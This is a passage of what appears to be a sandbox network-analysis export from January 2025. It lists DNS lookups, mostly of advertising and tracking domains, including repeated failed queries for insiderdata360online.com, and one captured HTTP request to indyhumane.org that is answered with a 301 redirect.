                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:16.502069950 CET1.1.1.1192.168.2.40x4f66No error (0)centro.vo.llnwd.net41.63.96.2A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:16.502069950 CET1.1.1.1192.168.2.40x4f66No error (0)centro.vo.llnwd.net41.63.96.130A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:16.566323042 CET1.1.1.1192.168.2.40x5de2Server failure (2)insiderdata360online.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:16.566768885 CET1.1.1.1192.168.2.40x4536Server failure (2)insiderdata360online.comnonenone65IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:16.793411016 CET1.1.1.1192.168.2.40xcd7cNo error (0)pixel.sitescout.com98.98.135.24A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:16.802752018 CET1.1.1.1192.168.2.40x6c91No error (0)pixel-sync.sitescout.com34.36.216.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.015688896 CET1.1.1.1192.168.2.40xb523No error (0)connect.facebook.netscontent.xx.fbcdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.015688896 CET1.1.1.1192.168.2.40xb523No error (0)scontent.xx.fbcdn.net157.240.252.13A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.015842915 CET1.1.1.1192.168.2.40xd5f6No error (0)connect.facebook.netscontent.xx.fbcdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.015842915 CET1.1.1.1192.168.2.40xd5f6No error (0)scontent.xx.fbcdn.net65IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.015842915 CET1.1.1.1192.168.2.40xd5f6No error (0)scontent.xx.fbcdn.net65IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.364506960 CET1.1.1.1192.168.2.40x7238No error (0)stats.g.doubleclick.net74.125.133.154A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.364506960 CET1.1.1.1192.168.2.40x7238No error (0)stats.g.doubleclick.net74.125.133.155A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.364506960 CET1.1.1.1192.168.2.40x7238No error (0)stats.g.doubleclick.net74.125.133.156A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.364506960 CET1.1.1.1192.168.2.40x7238No error (0)stats.g.doubleclick.net74.125.133.157A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.824271917 CET1.1.1.1192.168.2.40x7c32No error (0)www.facebook.comstar-mini.c10r.facebook.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.824271917 CET1.1.1.1192.168.2.40x7c32No error (0)star-mini.c10r.facebook.com157.240.0.35A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.824862957 CET1.1.1.1192.168.2.40xda35No error (0)www.facebook.comstar-mini.c10r.facebook.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.824862957 CET1.1.1.1192.168.2.40xda35No error (0)star-mini.c10r.facebook.com65IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.824862957 CET1.1.1.1192.168.2.40xda35No error (0)star-mini.c10r.facebook.com65IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.950035095 CET1.1.1.1192.168.2.40xd8f1Server failure (2)insiderdata360online.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:17.988198042 CET1.1.1.1192.168.2.40xcd76Server failure (2)insiderdata360online.comnonenone65IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:18.007788897 CET1.1.1.1192.168.2.40x7920Server failure (2)insiderdata360online.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:18.135493040 CET1.1.1.1192.168.2.40x6809No error (0)dpm.demdex.netgslb-2.demdex.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:18.135493040 CET1.1.1.1192.168.2.40x6809No error (0)gslb-2.demdex.netedge-irl1.demdex.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:18.135493040 CET1.1.1.1192.168.2.40x6809No error (0)edge-irl1.demdex.netdcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:18.135751009 CET1.1.1.1192.168.2.40xd646No error (0)dpm.demdex.netgslb-2.demdex.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:18.135751009 CET1.1.1.1192.168.2.40xd646No error (0)gslb-2.demdex.netedge-irl1.demdex.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:18.135751009 CET1.1.1.1192.168.2.40xd646No error (0)edge-irl1.demdex.netdcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:18.135751009 CET1.1.1.1192.168.2.40xd646No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com34.249.77.207A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:18.135751009 CET1.1.1.1192.168.2.40xd646No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com54.229.91.192A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:18.135751009 CET1.1.1.1192.168.2.40xd646No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com52.210.126.164A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:18.135751009 CET1.1.1.1192.168.2.40xd646No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com52.211.121.244A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:18.135751009 CET1.1.1.1192.168.2.40xd646No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com34.255.164.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:18.135751009 CET1.1.1.1192.168.2.40xd646No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com54.195.214.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:18.135751009 CET1.1.1.1192.168.2.40xd646No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com52.210.83.154A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:18.135751009 CET1.1.1.1192.168.2.40xd646No error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com18.203.216.236A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:18.136149883 CET1.1.1.1192.168.2.40x6ac2No error (0)pixel.tapad.com34.111.113.62A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:18.137717009 CET1.1.1.1192.168.2.40x54faNo error (0)loadm.exelator.comloadus.tm.ssl.exelator.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:18.137717009 CET1.1.1.1192.168.2.40x54faNo error (0)loadus.tm.ssl.exelator.comeu-west.load.exelator.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:18.137717009 CET1.1.1.1192.168.2.40x54faNo error (0)eu-west.load.exelator.comload-euw1.exelator.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:18.137717009 CET1.1.1.1192.168.2.40x54faNo error (0)load-euw1.exelator.com34.254.143.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:18.138566017 CET1.1.1.1192.168.2.40x4b63No error (0)idsync.rlcdn.com35.244.174.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:18.139106989 CET1.1.1.1192.168.2.40xfe4fNo error (0)sync.crwdcntrl.net52.49.239.226A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:18.139106989 CET1.1.1.1192.168.2.40xfe4fNo error (0)sync.crwdcntrl.net52.50.14.219A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:18.139106989 CET1.1.1.1192.168.2.40xfe4fNo error (0)sync.crwdcntrl.net54.77.101.113A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:18.139106989 CET1.1.1.1192.168.2.40xfe4fNo error (0)sync.crwdcntrl.net52.48.183.31A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:18.139106989 CET1.1.1.1192.168.2.40xfe4fNo error (0)sync.crwdcntrl.net34.248.19.126A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:18.139106989 CET1.1.1.1192.168.2.40xfe4fNo error (0)sync.crwdcntrl.net54.73.51.224A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:18.139106989 CET1.1.1.1192.168.2.40xfe4fNo error (0)sync.crwdcntrl.net52.17.153.181A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:18.139106989 CET1.1.1.1192.168.2.40xfe4fNo error (0)sync.crwdcntrl.net34.246.77.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:18.172257900 CET1.1.1.1192.168.2.40x9e6eNo error (0)loadm.exelator.comloadus.tm.ssl.exelator.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:18.172257900 CET1.1.1.1192.168.2.40x9e6eNo error (0)loadus.tm.ssl.exelator.comeu-west.load.exelator.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:18.172257900 CET1.1.1.1192.168.2.40x9e6eNo error (0)eu-west.load.exelator.comload-euw1.exelator.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:18.544195890 CET1.1.1.1192.168.2.40xa684No error (0)pixel.sitescout.com98.98.135.24A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:19.055263042 CET1.1.1.1192.168.2.40x49ccNo error (0)www.facebook.comstar-mini.c10r.facebook.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:19.055263042 CET1.1.1.1192.168.2.40x49ccNo error (0)star-mini.c10r.facebook.com157.240.251.35A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:19.055531979 CET1.1.1.1192.168.2.40x352dNo error (0)www.facebook.comstar-mini.c10r.facebook.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:19.055531979 CET1.1.1.1192.168.2.40x352dNo error (0)star-mini.c10r.facebook.com65IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:19.055531979 CET1.1.1.1192.168.2.40x352dNo error (0)star-mini.c10r.facebook.com65IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:19.063184023 CET1.1.1.1192.168.2.40x4238No error (0)virtual.urban-orthodontics.com185.76.79.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:19.555003881 CET1.1.1.1192.168.2.40x135fNo error (0)pixel.tapad.com34.111.113.62A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:19.937747955 CET1.1.1.1192.168.2.40xb65aNo error (0)dpm.demdex.netgslb-2.demdex.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:19.937747955 CET1.1.1.1192.168.2.40xb65aNo error (0)gslb-2.demdex.netedge-irl1.demdex.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:19.937747955 CET1.1.1.1192.168.2.40xb65aNo error (0)edge-irl1.demdex.netdcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:19.937747955 CET1.1.1.1192.168.2.40xb65aNo error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com52.208.198.158A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:19.937747955 CET1.1.1.1192.168.2.40xb65aNo error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com54.229.91.192A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:19.937747955 CET1.1.1.1192.168.2.40xb65aNo error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com52.211.121.244A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:19.937747955 CET1.1.1.1192.168.2.40xb65aNo error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com54.155.166.119A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:19.937747955 CET1.1.1.1192.168.2.40xb65aNo error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com54.73.122.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:19.937747955 CET1.1.1.1192.168.2.40xb65aNo error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com52.211.33.202A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:19.937747955 CET1.1.1.1192.168.2.40xb65aNo error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com52.214.247.153A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:19.937747955 CET1.1.1.1192.168.2.40xb65aNo error (0)dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com34.249.77.207A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:19.941222906 CET1.1.1.1192.168.2.40xbfc2No error (0)dpm.demdex.netgslb-2.demdex.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:19.941222906 CET1.1.1.1192.168.2.40xbfc2No error (0)gslb-2.demdex.netedge-irl1.demdex.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:19.941222906 CET1.1.1.1192.168.2.40xbfc2No error (0)edge-irl1.demdex.netdcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:20.152337074 CET1.1.1.1192.168.2.40x21c8No error (0)sync.crwdcntrl.net52.17.153.181A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:20.152337074 CET1.1.1.1192.168.2.40x21c8No error (0)sync.crwdcntrl.net52.50.14.219A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:20.152337074 CET1.1.1.1192.168.2.40x21c8No error (0)sync.crwdcntrl.net54.77.101.113A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:20.152337074 CET1.1.1.1192.168.2.40x21c8No error (0)sync.crwdcntrl.net52.49.239.226A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:20.152337074 CET1.1.1.1192.168.2.40x21c8No error (0)sync.crwdcntrl.net34.248.19.126A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:20.152337074 CET1.1.1.1192.168.2.40x21c8No error (0)sync.crwdcntrl.net52.48.183.31A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:20.152337074 CET1.1.1.1192.168.2.40x21c8No error (0)sync.crwdcntrl.net54.73.51.224A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:20.152337074 CET1.1.1.1192.168.2.40x21c8No error (0)sync.crwdcntrl.net34.246.77.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:22.183733940 CET1.1.1.1192.168.2.40x642eNo error (0)virtual.urban-orthodontics.com185.76.79.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:23.470014095 CET1.1.1.1192.168.2.40x1c58Server failure (2)insiderdata360online.comnonenone65IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:23.953048944 CET1.1.1.1192.168.2.40x249dServer failure (2)insiderdata360online.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:23.962260962 CET1.1.1.1192.168.2.40xbb95Server failure (2)insiderdata360online.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:24.527105093 CET1.1.1.1192.168.2.40xde50Server failure (2)insiderdata360online.comnonenone65IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:24.527116060 CET1.1.1.1192.168.2.40x7ed4Server failure (2)insiderdata360online.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:24.534482002 CET1.1.1.1192.168.2.40x8580Server failure (2)insiderdata360online.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:25.866693974 CET1.1.1.1192.168.2.40x7597No error (0)cm.g.doubleclick.net216.58.212.162A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:25.869529963 CET1.1.1.1192.168.2.40x87d6No error (0)fei.pro-market.net107.178.240.89A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:25.869621992 CET1.1.1.1192.168.2.40xf794No error (0)image2.pubmatic.comimage2v2.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:25.869621992 CET1.1.1.1192.168.2.40xf794No error (0)image2v2.pubmnet.compug-lhr-bc.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:25.869621992 CET1.1.1.1192.168.2.40xf794No error (0)pug-lhr-bc.pubmnet.com185.64.191.210A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:25.870034933 CET1.1.1.1192.168.2.40x9655No error (0)image2.pubmatic.comimage2v2.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:25.870034933 CET1.1.1.1192.168.2.40x9655No error (0)image2v2.pubmnet.compug-ams-bc.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:25.871669054 CET1.1.1.1192.168.2.40xcfa8No error (0)us-u.openx.net34.98.64.218A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:25.871669054 CET1.1.1.1192.168.2.40xcfa8No error (0)us-u.openx.net35.244.159.8A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:25.872688055 CET1.1.1.1192.168.2.40x3b51No error (0)ib.adnxs.comxandr-g-geo.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:25.872688055 CET1.1.1.1192.168.2.40x3b51No error (0)ib.anycast.adnxs.com185.89.210.153A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:25.872688055 CET1.1.1.1192.168.2.40x3b51No error (0)ib.anycast.adnxs.com185.89.210.90A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:25.872688055 CET1.1.1.1192.168.2.40x3b51No error (0)ib.anycast.adnxs.com185.89.210.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:25.872688055 CET1.1.1.1192.168.2.40x3b51No error (0)ib.anycast.adnxs.com185.89.210.141A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:25.872688055 CET1.1.1.1192.168.2.40x3b51No error (0)ib.anycast.adnxs.com185.89.210.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:25.872688055 CET1.1.1.1192.168.2.40x3b51No error (0)ib.anycast.adnxs.com185.89.211.116A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:25.872688055 CET1.1.1.1192.168.2.40x3b51No error (0)ib.anycast.adnxs.com185.89.211.84A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:25.872688055 CET1.1.1.1192.168.2.40x3b51No error (0)ib.anycast.adnxs.com185.89.210.180A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:25.872688055 CET1.1.1.1192.168.2.40x3b51No error (0)ib.anycast.adnxs.com185.89.210.122A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:25.872688055 CET1.1.1.1192.168.2.40x3b51No error (0)ib.anycast.adnxs.com185.89.210.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:25.872688055 CET1.1.1.1192.168.2.40x3b51No error (0)ib.anycast.adnxs.com185.89.210.244A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:25.872688055 CET1.1.1.1192.168.2.40x3b51No error (0)ib.anycast.adnxs.com185.89.210.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:25.915047884 CET1.1.1.1192.168.2.40x5717Server failure (2)insiderdata360online.comnonenone65IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:25.915060043 CET1.1.1.1192.168.2.40x6797Server failure (2)insiderdata360online.comnonenone65IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:25.943962097 CET1.1.1.1192.168.2.40x6fafServer failure (2)insiderdata360online.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:26.707189083 CET1.1.1.1192.168.2.40x1d91No error (0)fei.pro-market.net107.178.240.89A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:26.760365963 CET1.1.1.1192.168.2.40xb986No error (0)image2.pubmatic.comimage2v2.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:26.760365963 CET1.1.1.1192.168.2.40xb986No error (0)image2v2.pubmnet.compug-lhr-bc.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:26.760365963 CET1.1.1.1192.168.2.40xb986No error (0)pug-lhr-bc.pubmnet.com185.64.191.210A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:26.760579109 CET1.1.1.1192.168.2.40x549eNo error (0)image2.pubmatic.comimage2v2.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:26.760579109 CET1.1.1.1192.168.2.40x549eNo error (0)image2v2.pubmnet.compug-ams-bc.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:26.846093893 CET1.1.1.1192.168.2.40x7bc4No error (0)cm.g.doubleclick.net142.250.185.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:27.270061016 CET1.1.1.1192.168.2.40x7dd8No error (0)us-u.openx.net35.244.159.8A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:27.270061016 CET1.1.1.1192.168.2.40x7dd8No error (0)us-u.openx.net34.98.64.218A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:27.783282995 CET1.1.1.1192.168.2.40x7edaNo error (0)ib.adnxs.comxandr-g-geo.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:27.783282995 CET1.1.1.1192.168.2.40x7edaNo error (0)ib.anycast.adnxs.com37.252.171.85A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:27.783282995 CET1.1.1.1192.168.2.40x7edaNo error (0)ib.anycast.adnxs.com37.252.172.123A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:27.783282995 CET1.1.1.1192.168.2.40x7edaNo error (0)ib.anycast.adnxs.com37.252.173.215A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:27.783282995 CET1.1.1.1192.168.2.40x7edaNo error (0)ib.anycast.adnxs.com37.252.171.149A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:27.783282995 CET1.1.1.1192.168.2.40x7edaNo error (0)ib.anycast.adnxs.com37.252.171.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:27.783282995 CET1.1.1.1192.168.2.40x7edaNo error (0)ib.anycast.adnxs.com37.252.171.52A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:27.783282995 CET1.1.1.1192.168.2.40x7edaNo error (0)ib.anycast.adnxs.com37.252.171.53A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:46.283140898 CET1.1.1.1192.168.2.40xd78cNo error (0)googleads.g.doubleclick.net65IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:46.283525944 CET1.1.1.1192.168.2.40x97c3No error (0)googleads.g.doubleclick.net142.250.185.226A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:47.996315002 CET1.1.1.1192.168.2.40xf2f4No error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:47.996599913 CET1.1.1.1192.168.2.40xd5bNo error (0)www.google.com172.217.23.100A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:50.583580017 CET1.1.1.1192.168.2.40xe96bServer failure (2)insiderdata360online.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        0192.168.2.449742199.16.172.26802044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:06.104429007 CET429OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                        Host: indyhumane.org
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                        Jan 9, 2025 02:59:06.583947897 CET415INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                        Date: Thu, 09 Jan 2025 01:59:06 GMT
                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                        Content-Length: 162
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        Location: https://indyhumane.org/
                                                                                                                                                                                                                                                        X-ac: 1.jfk _atomic_dca BYPASS
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
